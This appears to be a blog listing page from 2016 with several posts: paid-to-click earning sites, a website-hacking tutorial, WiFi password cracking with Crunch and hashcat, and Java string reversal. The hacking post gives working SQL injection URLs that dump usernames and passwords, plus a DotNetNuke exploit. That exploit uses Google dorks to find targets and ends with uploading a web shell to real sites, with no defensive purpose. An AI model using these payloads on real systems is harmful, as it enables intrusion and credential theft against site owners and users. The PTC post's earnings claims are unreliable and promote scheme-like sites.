Showing posts with label With. Show all posts
Showing posts with label With. Show all posts

Friday, 6 May 2016

Get Paid to Read Ads with 7 Most Trusted PTC Sites 2016

There are millions of people worldwide who are dependent on PTC sites or Paid to click websites when it comes to fulfil their extra earning requirements. But only a fraction of people are earning good money from these paid to click sites. There are many reason for this but one of the biggest reason is many of them join scam PTC sites.
So you don’t need to worry as we have tested hundreds of sites & after doing our research & receiving payments from some of the sites, we are able to recommend you to these PTC sites for extra earnings.
PTC sites are nothing but paid to click sites where you can join & get paid for viewing the ads. If you work 5-7 minutes on one website daily then you  can earn $200 monthly (Rs.10,000+) from these 6 sites.
Joining any PTC site is absolutely free.
There are some tips if you follow & do it properly then you can earn more than $200 a month from these sites by working 30 minutes to 1 hour on these sites. So don’t forget to read about these tips at the end of this article.

Top 7 PTC Sites in 2015

We have done a complete research & have received number of payments from these 7 PTC sites. So you can join them from the members of these top 10 PTC websites. Although we have found some more trusted sites but we thought of including only these top 7 sites.Best PTC Sites

1.  ClixSense

ClixSense undoubtedly is one of the most trusted PTC sites on internet. There are number of ways you can earn money from ClixSense. If you work seriously on ClixSense alone then you can earn Rs.8000-Rs.10,000 from this one website.

Members Benefit:

  • Earn by viewing dozens of ads daily
  • Multiply your earnings through referral or premium membership
  • Earn money by doing complete offers & surveys
  • Win Daily Prizes Up To $10.00
  • Fast Payment through PayPal
I have earned more than Rs.65,000 till date from ClixSense. Check this to know more about ClixSense, how to start & see my payment proof.

2. InboxDollar

This is another trusted sites for international members. There are number of ways you can earn from InboxDollars. There are thousands of people who earn more than $100+ per month from this single website by working 5-10 minutes a day.
I have written a complete InboxDollars review here which can help you to earn a good extra income from this website.

3. Traffic Monsson

Traffic Monsoon is one of the most popular PTC site where people can earn big money. There are multiple ways to earn income as provided below-
  1. By viewing Cashlink ads – First you need to get qualified by surfing 10 ads 2 times a day (from Start Surfing links). Once qualified, you will get Cashlink ads. Check Cashlink ads 2-3 times daily.
  2. By referring members –  Earn 100% of referral income.
  3. Earn from AdPack purchase – 1 AdPack of $50 will give you $55 ads + No. of other benefits.

4. Paidverts

Although Paidverts is not as old as NeoBux & ClixSense but its rapidly gaining the trust of one of high paid PTC sites. People are earning great income by working on Paidverts. The concept is different than other PTC sites. When you join Paidverts, you need to click 16 Bonus Ads Points (BAP) or Activation daily till you click total 100 BAP Ads. You will start receiving the paid ads only after you click 100 BAP ads.
The value of paid ads depends on how much BAP you accumulate. So get as much as BAP as you can.

5. NeoBux

NeoBux is another oldest and best PTC site to join. If you want to earn good income from NeoBux then you need to view all the ads on regular basis at a fixed time & refer more & more people in NeoBux. I have received many payment from this website & read lots of success stories on internet from the people who are earning more than Rs.50,000 a month NeoBux.
You can check its FAQ section on NeoBux website to learn more about it.

6. BuxP

BUXP is a new innovative, international and free English based service that allows advertisers to reach thousands of potential customers by displaying their ad on our, “Browse Ads” page where members are able to view these ads and get paid. Minimum cashout is $8.00.
Earnings Per Click From YouEarnings Per Click From Your Referral
Standard Members
5 Second Ads: $0.001
30 Second Ads: $0.005
45 Second Ads: $0.006
Video Ads: $0.001
Premium Members
5 Second Ads: $0.002
30 Second Ads: $0.01
45 Second Ads: $0.011
Video Ads: $0.002
Standard Members
5 Second Ads: $0.0005
30 Second Ads: $0.002
45 Second Ads: $0.003
Premium Members
5 Second Ads: $0.001
30 Second Ads: $0.004
45 Second Ads: $0.006
So these are some of the top PTC sites where you can join, get assured of viewing hundreds of ads and other earning offers and regular payments. All these sites has got a great payment history with good feedback from their members.
Tips to earn more in PTC sites:
  1. Make it a habit to view all the ads daily at a fix time.
  2. Go for a premium membership if you can.
  3. Refer as many people as you can through email, Facebook, Watsup & other ways.
You can receive your earning through PayPal. If you don’t have idea of PayPal then you can refer this article about PayPal.

Sunday, 1 May 2016

Learn How To Hack Websites With Two Different Techniques 2016

1 . SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website




2.  Portal Hacking (DNN) Technique:-

One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites.. 

Here U can use dez two Google Dorks

1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx


You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.


Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx



Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')


Step 9: You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc 

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have & upload here.
Now Go to main page and refresh. you have seen hacked the website.


Done..!!


Tuesday, 26 April 2016

Creating a Dictionary / Wordlist with Crunch Part 8 - Backtrack

Introduction To Kali and WiFi Pen Testing
How to Install Kali Linux
WEP Hacking
Kali Linux and Reaver
Getting a Handshake and a Data Capture, WPA Dictionary Attack
Using Aircrack and a Dictionary to Crack a WPA Data Capture
Cracking a WPA Capture with the GPU using HashCat
Creating a Dictionary / Wordlist with Crunch Part 8

Creating a Dictionary Wordlist with Crunch

Crunch is a useful program for creating and outputting wordlist or dictionaries to be used with brute force attacks. Crunch can send a wordlist to the screen, file, or another program.
Here is how to create a dictionary with Crunch.

The syntax will be:
crunch (min)(max)(charset) -t (pattern) – o (filename.lst)

min = minimum characters that you want to add in your dictionary
max = maximum characters that you want to add in your dictionary
Charset = Which characters you want to add in your wordlist such as abcd or 123456
Pattern = Some characters can be static or dynamic meaning you can specify letters to change or not change.

For example, if I want to create a minimum 7 digits, maximum 7 digits, qwer987 with pattern qwe@@@@ and to save the file in the desktop folder.

The command would be:
crunch 7 7 qwer987 -t qwr@@@@ -o /root/Desktop/ dictionary.txt


Cracking a WPA Capture with the GPU using HashCat Part 7 - Backtrack


Cracking a WPA Capture with the GPU using HashCat
After a WPA/WPA 2 Handshake Capture has been saved to a drive cracking it with current computers can be challenging. To speed this process up the GPU in some video cards can be utilized.

This can speed things up drastically when doing a brute force crack on a WPA data capture.

You will need to know the video card you are currently using and Google it to see if it is compatible.

In the instructions before this aircrack-ng was used to show how to crack a WPA capture with a dictionary.

 In this example a tool called oclHashCat will be used in order to utilize a video cards GPU.

dictionary file and the data capture are still needed only we will be using the video cards GPU to speed up the process. Always check to see if your card is compatible and the correct drivers are loaded.

Nvidia and AMD/ATI Video cards use two separate hashcat names.

The two main versions of HashCat are:
oclHashCat for AMD/ATI graphics cards
cudaHashCat for Nvidia graphics cards

You can download both from here http://hashcat.net/files/oclHashcat-plus-0.14.7z

Extract it with 7z x oclHashcat-plus-0.14.7z (Don’t use 7x e as it will not preserve the directory structure.)

To use hashcat the .cap file needs to be converted to ahccap file to do this use air-crack-ng.

aircrack-ng (out.cap) -J (out.hccap)

Run hashcat against your new capture file using the correct version.

cudaHashcat-plus32.bin -m 2500 (filename).hccap (wordlist)



Friday, 22 April 2016

5 Ways To Reverse A String In Java With Example

In this tutorial we will discuss  how to reverse a string in java . Although there are many ways to get the solution but we are sharing 5 different ways to  reverse a string. This question is frequently asked in the technical interview of java.This question is easy , but please mark this question in your to do list before attending any technical interview in java. First we will understand the question by writing example.

Input :   malayalam
Output: malayalam

Input : akbar
Output : rabka

Points to Keep in Mind Before attempting the Solution:

1. String class in java do not have reverse() method , StringBuilder class does have built in reverse() method.
2. StringBuilder class do not have toCharArray() method , while String class does have toCharArray() method.

Pseudo Code for Reverse String Method 1:

1. The user will input the string to be reversed.
2. First we will convert String to character array by using the built in java String class method toCharArray().

3. Then , we will scan the string from end  to start,  and print the character one by one.


import java.io.*;
import java.util.*;

public class reverseString {
    public static void main(String[] args) {
        String input="";
        System.out.println("Enter the input string");
        try
        {
            BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
            input = br.readLine();
            char[] try1= input.toCharArray();
            for (int i=try1.length-1;i>=0;i--)
            System.out.print(try1[i]);
        }
        catch (IOException e) {
            e.printStackTrace();
        }
}}

Pseudo Code for Reverse String Method 2:

1.  In the second method , we will use the built in reverse() method of the StringBuilder class ,.
Note :  String class does not have reverse() method . So we need to convert the input string to StringBuilder , which is achieved by using the append method of the StringBuilder.

2.  After that print out the characters of the reversed string  by scanning from the first till the last index.


import java.io.*;
import java.util.*;

public class reverseString {
 public static void main(String[] args) {
  String input="AliveisAwesome";
  StringBuilder input1 = new StringBuilder();
  input1.append(input);
  input1=input1.reverse(); 
  for (int i=0;i<input1.length();i++)
  System.out.print(input1.charAt(i));  
 }}
  



Pseudo Code for Reverse String Method 3:

1. Convert the input string into character array by using the toCharArray() built in method of the String Class .
2. In this method we will scan the character array from both sides , that is from the start index (left) as well as from last index(right) simultaneously.
3. Set the left index equal to 0 and right index equal to the length of the string -1.
4. Swap the characters of the start index scanning with the last index scanning  one by one .After that  increase the left index by 1 (left++) and decrease the right by 1 i.e (right--) to move on to the next characters in the character array .
5. Continue till left is less than or equal to the right .


import java.io.*;
import java.util.*;

public class reverseString {
 public static void main(String[] args) {
    String input = "Be in present";
    char[] temparray= input.toCharArray();
    int left,right=0;
    right=temparray.length-1;
    for (left=0; left < right ; left++ ,right--)
    {
     // Swap values of left and right 
     char temp = temparray[left];
     temparray[left] = temparray[right];
     temparray[right]=temp;
    }
    for (char c : temparray)
     System.out.print(c);
    System.out.println();
   }}
  

Pseudo Code for Reverse String Method  4:

1. Convert the input string into the character array by using toCharArray() built in method.
reverse a string in java with example
2. Then add the characters of the array into the LinkedList object . We used LinkedList because it maintains the insertion order of the input values.
3. Java also has  built  in reverse() method for the Collections class . Since Collections class reverse() method takes a  list object , to reverse the list , we will pass the LinkedList object which is a type of list of characters.
4. We will create the ListIterator object by using the listIterator() method on the LinkedList object.
ListIterator object is used to iterate over the list.
5. ListIterator object will help us to iterate over the reversed list and print it one by one to the output screen.


import java.io.*;
import java.util.*;

public class reverseString {
 public static void main(String[] args) {
     String input = "Be in present";
     char[] hello=input.toCharArray();
     List<Character> trial1= new LinkedList<>();
     for(char c: hello)
     trial1.add(c);
     Collections.reverse(trial1);
     ListIterator li = trial1.listIterator();  
     while(li.hasNext())
    {System.out.print(li.next());}  
   }}
  

Pseudo Code for Reverse String Method 5 :

1. The last method is converting string into bytes .  getBytes()  method  is used to convert the input string into bytes[].
2. Then we will create a temporary byte[]  of length equal to the length of the input string.
3. We will store the bytes(which we get by using getBytes() method) in reverse order   into the temporary byte[] .


package ctci;
import java.io.*;
import java.util.*;

public class reverseString {
 public static void main(String[] args) {
  String input = "Be in present";
  byte [] strAsByteArray = input.getBytes();
  byte [] result = new byte [strAsByteArray.length];
   
  for(int i = 0; i<strAsByteArray.length; i++){
  result[i] = strAsByteArray[strAsByteArray.length-i-1];
  }
  System.out.println( new String(result));
   }}